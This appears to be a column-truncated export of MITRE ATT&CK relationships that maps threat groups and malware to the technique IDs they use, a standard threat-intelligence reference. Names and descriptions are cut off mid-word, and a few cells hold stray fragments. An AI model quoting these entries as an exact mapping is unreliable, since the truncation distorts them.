G0112 Windshift intrusion- group uses T1566.003Spearphishiattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1082 System Inf attack-pat technique [Windshift
G0112 Windshift intrusion- group uses T1033 System Own attack-pat technique [Windshift
G0112 Windshift intrusion- group uses T1059.005Visual Basiattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1071.001Web Protocattack-pat technique [Windshift
G0112 Windshift intrusion- group uses T1047 Windows M attack-pat technique [Windshift
G0044 Winnti Grointrusion- group uses T1553.002Code Signi attack-pat technique [Winnti Gro
G0044 Winnti Grointrusion- group uses T1583.001Domains attack-pat technique [Winnti Gro
G0044 Winnti Grointrusion- group uses T1083 File and Di attack-pat technique [Winnti Gr
G0044 Winnti Grointrusion- group uses T1105 Ingress Tooattack-pat technique [Winnti Gr
G0044 Winnti Grointrusion- group uses T1057 Process Di attack-pat technique [Winnti Gro
G0044 Winnti Grointrusion- group uses T1014 Rootkit attack-pat technique [Winnti Gro
G1035 Winter Vivintrusion- group uses T1119 Automatedattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1020 Automatedattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1059 Command attack-pat
an technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1140 Deobfuscatattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1583.001Domains attack-pat technique [Winter Vi
G1035 Winter Vivintrusion- group uses T1189 Drive-by C attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1041 Exfiltratio attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1190 Exploit Pubattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1083 File and Di attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1105 Ingress Tooattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1059.007JavaScript attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1114.001Local Emailattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1204.001Malicious Lattack-pat technique [Winter Vi
G1035 Winter Vivintrusion- group uses T1036.004Masquerade attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1036 Masqueradattack-pat technique [Winter Vi
G1035 Winter Vivintrusion- group uses T1059.001PowerShellattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1053.005Scheduled attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1113 Screen Capattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1566.001Spearphishattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1082 System Inf attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1033 System Own attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1583.003Virtual Pri attack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1595.002Vulnerabiliattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1056.003Web Portalattack-pat technique [Winter Viv
G1035 Winter Vivintrusion- group uses T1071.001Web Protocattack-pat technique [Winter Vi
G1035 Winter Vivintrusion- group uses T1584.006Web Servicattack-pat technique [Winter Vi
G1035 Winter Vivintrusion- group uses T1059.003Windows Cattack-pat technique [Winter Viv
G0102 Wizard Spiintrusion- group uses T1560.001Archive viaattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1197 BITS Jobs attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1553.002Code Signi attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1588.003Code Signinattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1027.010Command aOttack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1074 Data Stageattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1005 Data from attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1562.001Disable or attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1087.002Domain Acattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1136.002Domain Acattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1078.002Domain Acattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1055.001Dynamic-linattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1585.002Email Accoattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1041 Exfiltratio attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1048.003Exfiltrati attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1567.002Exfiltratio attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1210 Exploitatioattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1133 External R attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1070.004File Deleti attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1552.006Group Poliattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1105 Ingress Tooattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1490 Inhibit Sy attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1558.003Kerberoastattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1557.001LLMNR/NBT attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1003.001LSASS Memattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1570 Lateral Tooattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1136.001Local Acco attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1074.001Local Data attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1204.002Malicious Fattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1204.001Malicious Lattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1036.004Masquerade attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1112 Modify Regattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1003.003NTDS attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1135 Network Shattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1550.002Pass the H attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1059.001PowerShellattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1055 Process Injattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1547.001Registry Ruattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1021.001Remote Des attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1021 Remote Serattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1018 Remote Sysattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1218.011Rundll32 attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1021.002SMB/Windo attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1053.005Scheduled attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1003.002Security A attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1518.001Security S attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1569.002Service Ex attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1489 Service Stoattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1518 Software Dattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1566.001Spearphishattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1566.002Spearphishattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1082 System Inf attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1016 System Netattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1033 System Own attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1588.002Tool attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1078 Valid Acco attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1071.001Web Protocattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1059.003Windows Cattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1555.004Windows Cattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1222.001Windows Fiattack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1047 Windows M attack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1021.006Windows Rattack-pat technique [Wizard Sp
G0102 Wizard Spiintrusion- group uses T1543.003Windows Se attack-pat technique [Wizard Spi
G0102 Wizard Spiintrusion- group uses T1547.004Winlogon Hattack-pat technique [Wizard Sp
G0128 ZIRCONIU intrusion- group uses T1102.002Bidirectio attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1555.003Credential attack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1140 Deobfuscatattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1583.001Domains attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1041 Exfiltratio attack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1567.002Exfiltratio attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1068 Exploitatioattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1105 Ingress Tooattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1204.001Malicious Lattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1036.004Masquerade attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1036 Masqueradattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1218.007Msiexec attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1090.003Multi-hop attack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1584.008Network Deattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1598 Phishing foattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1059.006Python attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1012 Query Regiattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1547.001Registry Ruattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1027.002Software Pattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1566.002Spearphishattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1598.003Spearphishattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1573.001Symmetric attack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1082 System Inf attack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1016 System Netattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1033 System Own attack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1124 System Timattack-pat technique [ZIRCONIUM]
G0128 ZIRCONIU intrusion- group uses T1583.006Web Servicattack-pat technique [ZIRCONIUM
G0128 ZIRCONIU intrusion- group uses T1059.003Windows Cattack-pat technique [ZIRCONIUM
G0018 admin@33intrusion- group uses T1203 Exploitatioattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1083 File and Di attack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1087.001Local Acco attack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1069.001Local Grouattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1204.002Malicious Fattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1036.005Match Legiattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1566.001Spearphishattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1082 System Inf attack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1016 System Netattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1049 System Netattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1007 System Serattack-pat technique [admin@338
G0018 admin@33intrusion- group uses T1059.003Windows Cattack-pat technique Following
G0045 menuPass intrusion- group uses T1560 Archive Coattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1560.001Archive viaattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1119 Automatedattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1070.003Clear Comm attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1553.002Code Signi attack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1574.001DLL Searchattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1574.002DLL Side-L attack-pat technique [menuPass]
[menuPass](https://attack.m
G0045 menuPass intrusion- group uses T1005 Data from attack-pat technique
G0045 menuPass intrusion- group uses T1039 Data from attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1140 Deobfuscatattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1087.002Domain Acattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1583.001Domains attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1027.013Encrypted/attack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1190 Exploit Pubattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1210 Exploitatioattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1090.002External Prattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1568.001Fast Flux attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1070.004File Deleti attack-pat technique A [menuPass
G0045 menuPass intrusion- group uses T1083 File and Di attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1105 Ingress Tooattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1218.004InstallUtil attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1056.001Keyloggingattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1003.004LSA Secret attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1074.001Local Data attack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1204.002Malicious Fattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1036 Masqueradattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1036.005Match Legiattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1003.003NTDS attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1106 Native API attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1046 Network Seattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1059.001PowerShellattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1055.012Process Hoattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1074.002Remote Datattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1021.001Remote Des attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1018 Remote Sysattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1036.003Rename Sys attack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1021.004SSH attack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1053.005Scheduled attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1003.002Security A attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1566.001Spearphishattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1016 System Netattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1049 System Netattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1588.002Tool attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1199 Trusted Relattack-pat technique [menuPass](
G0045 menuPass intrusion- group uses T1078 Valid Acco attack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1059.003Windows Cattack-pat technique [menuPass]
G0045 menuPass intrusion- group uses T1047 Windows M attack-pat technique [menuPass]
S0066 3PARA RATmalware-- software uses T1083 File and Di attack-pat technique [3PARA RAT]
S0066 3PARA RATmalware-- software uses T1573.001Symmetric attack-pat technique [3PARA RAT
S0066 3PARA RATmalware-- software uses T1070.006Timestompattack-pat technique [3PARA RAT]
S0066 3PARA RATmalware-- software uses T1071.001Web Protocattack-pat technique [3PARA RAT
S0065 4H RAT malware-- software uses T1083 File and Di attack-pat technique [4H RAT](ht
S0065 4H RAT malware-- software uses T1057 Process Di attack-pat technique [4H RAT](ht
S0065 4H RAT malware-- software uses T1573.001Symmetric attack-pat technique [4H RAT](h
S0065 4H RAT malware-- software uses T1082 System Inf attack-pat technique [4H RAT](ht
S0065 4H RAT malware-- software uses T1071.001Web Protocattack-pat technique [4H RAT](h
S0065 4H RAT malware-- software uses T1059.003Windows Cattack-pat technique [4H RAT](ht
S0677 AADInternatool--2c52 software uses T1087.004Cloud Accoattack-pat technique [AADIntern
S0677 AADInternatool--2c52 software uses T1136.003Cloud Accoattack-pat technique [AADIntern
S0677 AADInternatool--2c52 software uses T1651 Cloud Admattack-pat technique [AADIntern
S0677 AADInternatool--2c52 software uses T1069.003Cloud Grouattack-pat technique [AADIntern
S0677 AADInternatool--2c52 software uses T1526 Cloud Servattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1552.001Credentialsattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1530 Data from attack-pat technique AADInternal
S0677 AADInternatool--2c52 software uses T1098.005Device Regiattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1590.001Domain Proattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1589.002Email Addrattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1048 Exfiltratio attack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1556.007Hybrid Idenattack-pat technique [AADIntern
S0677 AADInternatool--2c52 software uses T1003.004LSA Secret attack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1112 Modify Regattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1556.006Multi-Fact attack-pat technique The [AADIn
S0677 AADInternatool--2c52 software uses T1059.001PowerShellattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1552.004Private Keyattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1606.002SAML Tokeattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1558.002Silver Tickeattack-pat technique [AADIntern
S0677 AADInternatool--2c52 software uses T1566.002Spearphishattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1598.003Spearphishattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1528 Steal Appliattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1649 Steal or Foattack-pat technique [AADInterna
S0677 AADInternatool--2c52 software uses T1484.002Trust Modifattack-pat technique [AADInterna
S0469 ABK malware--asoftware uses T1140 Deobfuscatattack-pat technique [ABK](https
S0469 ABK malware--asoftware uses T1105 Ingress Tooattack-pat technique [ABK](https
S0469 ABK malware--asoftware uses T1055 Process Injattack-pat technique [ABK](https
S0469 ABK malware--asoftware uses T1518.001Security S attack-pat technique [ABK](https
S0469 ABK malware--asoftware uses T1027.003Steganogr attack-pat technique [ABK](https
S0469 ABK malware--asoftware uses T1071.001Web Protocattack-pat technique [ABK](https
S0469 ABK malware--asoftware uses T1059.003Windows Cattack-pat technique [ABK](https
S0045 ADVSTOREmalware--fsoftware uses T1560 Archive Coattack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1560.003Archive vi attack-pat technique [ADVSTORES
S0045 ADVSTOREmalware--fsoftware uses T1573.002Asymmetricattack-pat technique A variant
S0045 ADVSTOREmalware--fsoftware uses T1546.015Componentattack-pat technique Some varian
S0045 ADVSTOREmalware--fsoftware uses T1041 Exfiltratio attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1070.004File Deleti attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1083 File and Di attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1056.001Keyloggingattack-pat technique [ADVSTORES
S0045 ADVSTOREmalware--fsoftware uses T1074.001Local Data attack-pat technique [ADVSTORES
S0045 ADVSTOREmalware--fsoftware uses T1112 Modify Regattack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1106 Native API attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1027 Obfuscatedattack-pat technique Most of th
S0045 ADVSTOREmalware--fsoftware uses T1120 Peripheral attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1057 Process Di attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1012 Query Regiattack-pat technique [ADVSTORES
S0045 ADVSTOREmalware--fsoftware uses T1547.001Registry Ruattack-pat technique [ADVSTORES
S0045 ADVSTOREmalware--fsoftware uses T1218.011Rundll32 attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1029 Scheduled attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1132.001Standard Eattack-pat technique C2 traffic
S0045 ADVSTOREmalware--fsoftware uses T1573.001Symmetric attack-pat technique A variant
S0045 ADVSTOREmalware--fsoftware uses T1082 System Inf attack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1071.001Web Protocattack-pat technique [ADVSTORESH
S0045 ADVSTOREmalware--fsoftware uses T1059.003Windows Cattack-pat technique [ADVSTORES
S1074 ANDROMEmalware-- software uses T1105 Ingress Tooattack-pat technique [ANDROMEDA
S1074 ANDROMEmalware-- software uses T1036.008Masquerade attack-pat technique [ANDROMEDA
S1074 ANDROMEmalware-- software uses T1036.005Match Legiattack-pat technique [ANDROMEDA
S1074 ANDROMEmalware-- software uses T1055 Process Injattack-pat technique [ANDROMEDA
S1074 ANDROMEmalware-- software uses T1547.001Registry Ruattack-pat technique [ANDROMEDA
S1074 ANDROMEmalware-- software uses T1091 Replicatio attack-pat technique [ANDROMEDA
S1074 ANDROMEmalware-- software uses T1071.001Web Protocattack-pat technique [ANDROMEDA
S0073 ASPXSpy malware--5software uses T1505.003Web Shell attack-pat technique [ASPXSpy](h
S1125 AcidRain malware--0software uses T1485 Data Destrattack-pat technique [AcidRain](
S1125 AcidRain malware--0software uses T1561.001Disk Conteattack-pat technique [AcidRain](
S1125 AcidRain malware--0software uses T1083 File and Di attack-pat technique [AcidRain](
S1125 AcidRain malware--0software uses T1529 System Sh attack-pat technique [AcidRain](
S1028 Action RATmalware-- software uses T1005 Data from attack-pat technique [Action RAT
S1028 Action RATmalware-- software uses T1140 Deobfuscatattack-pat technique [Action RA
S1028 Action RATmalware-- software uses T1083 File and Di attack-pat technique [Action RAT
S1028 Action RATmalware-- software uses T1105 Ingress Tooattack-pat technique [Action RAT
S1028 Action RATmalware-- software uses T1027 Obfuscatedattack-pat technique [Action R
S1028 Action RATmalware-- software uses T1518.001Security S attack-pat technique [Action RA
S1028 Action RATmalware-- software uses T1082 System Inf attack-pat technique [Action RAT
S1028 Action RATmalware-- software uses T1016 System Netattack-pat technique [Action RAT
S1028 Action RATmalware-- software uses T1033 System Own attack-pat technique [Action RA
S1028 Action RATmalware-- software uses T1071.001Web Protocattack-pat technique [Action RA
S1028 Action RATmalware-- software uses T1059.003Windows Cattack-pat technique [Action RA
S1028 Action RATmalware-- software uses T1047 Windows M attack-pat technique [Action RA
S0552 AdFind tool--f595 software uses T1087.002Domain Acattack-pat technique [AdFind](h
S0552 AdFind tool--f595 software uses T1069.002Domain Grattack-pat technique [AdFind](h
S0552 AdFind tool--f595 software uses T1482 Domain Truattack-pat technique [AdFind](ht
S0552 AdFind tool--f595 software uses T1018 Remote Sysattack-pat technique [AdFind](ht
S0552 AdFind tool--f595 software uses T1016 System Netattack-pat technique [AdFind](ht
S0331 Agent Tesl malware-- software uses T1560 Archive Coattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1185 Browser Seattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1115 Clipboard attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1552.001Credentialsattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1555 Credential attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1555.003Credential attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1552.002Credentialsattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1140 Deobfuscatattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1562.001Disable or attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1048.003Exfiltrati attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1203 Exploitatioattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1564.001Hidden Fileattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1564.003Hidden Wi attack-pat technique [Agent Tes
S0331 Agent Tesl malware-- software uses T1105 Ingress Tooattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1056.001Keyloggingattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1087.001Local Acco attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1071.003Mail Protocattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1204.002Malicious Fattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1112 Modify Regattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1027 Obfuscatedattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1057 Process Di attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1055.012Process Hoattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1055 Process Injattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1547.001Registry Ruattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1218.009Regsvcs/R attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1053.005Scheduled attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1113 Screen Capattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1566.001Spearphishattack-pat technique The primary
S0331 Agent Tesl malware-- software uses T1082 System Inf attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1016 System Netattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1033 System Own attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1124 System Timattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1125 Video Captattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1497 Virtualiza attack-pat technique [Agent Tes
S0331 Agent Tesl malware-- software uses T1071.001Web Protocattack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1016.002Wi-Fi Disc attack-pat technique [Agent Tesl
S0331 Agent Tesl malware-- software uses T1047 Windows M attack-pat technique [Agent Tesl
S0092 Agent.btz malware-- software uses T1560.003Archive vi attack-pat technique [Agent.btz]
S0092 Agent.btz malware-- software uses T1052.001Exfiltratio attack-pat technique [Agent.btz]
S0092 Agent.btz malware-- software uses T1105 Ingress Tooattack-pat technique [Agent.btz]
S0092 Agent.btz malware-- software uses T1091 Replicatio attack-pat technique [Agent.btz]
S0092 Agent.btz malware-- software uses T1016 System Netattack-pat technique [Agent.btz]
S0092 Agent.btz malware-- software uses T1033 System Own attack-pat technique [Agent.btz]
S1129 Akira malware-- software uses T1486 Data Encryattack-pat technique [Akira](htt
S1129 Akira malware-- software uses T1083 File and Di attack-pat technique [Akira](ht
S1129 Akira malware-- software uses T1490 Inhibit Sy attack-pat technique [Akira](ht
S1129 Akira malware-- software uses T1106 Native API attack-pat technique [Akira](ht
S1129 Akira malware-- software uses T1135 Network Shattack-pat technique [Akira](htt
S1129 Akira malware-- software uses T1059.001PowerShellattack-pat technique [Akira](ht
S1129 Akira malware-- software uses T1057 Process Di attack-pat technique [Akira](htt
S1129 Akira malware-- software uses T1082 System Inf attack-pat technique [Akira](ht
S1129 Akira malware-- software uses T1059.003Windows Cattack-pat technique [Akira](ht
S1129 Akira malware-- software uses T1047 Windows M attack-pat technique [Akira](htt
S1025 Amadey malware-- software uses T1005 Data from attack-pat technique [Amadey](h
S1025 Amadey malware-- software uses T1140 Deobfuscatattack-pat technique [Amadey](h
S1025 Amadey malware-- software uses T1041 Exfiltratio attack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1568.001Fast Flux attack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1083 File and Di attack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1105 Ingress Tooattack-pat technique [Amadey](h
S1025 Amadey malware-- software uses T1553.005Mark-of-thattack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1112 Modify Regattack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1106 Native API attack-pat technique [Amadey](h
S1025 Amadey malware-- software uses T1027 Obfuscatedattack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1547.001Registry Ruattack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1518.001Security S attack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1082 System Inf attack-pat technique [Amadey](h
S1025 Amadey malware-- software uses T1614 System Locattack-pat technique [Amadey](ht
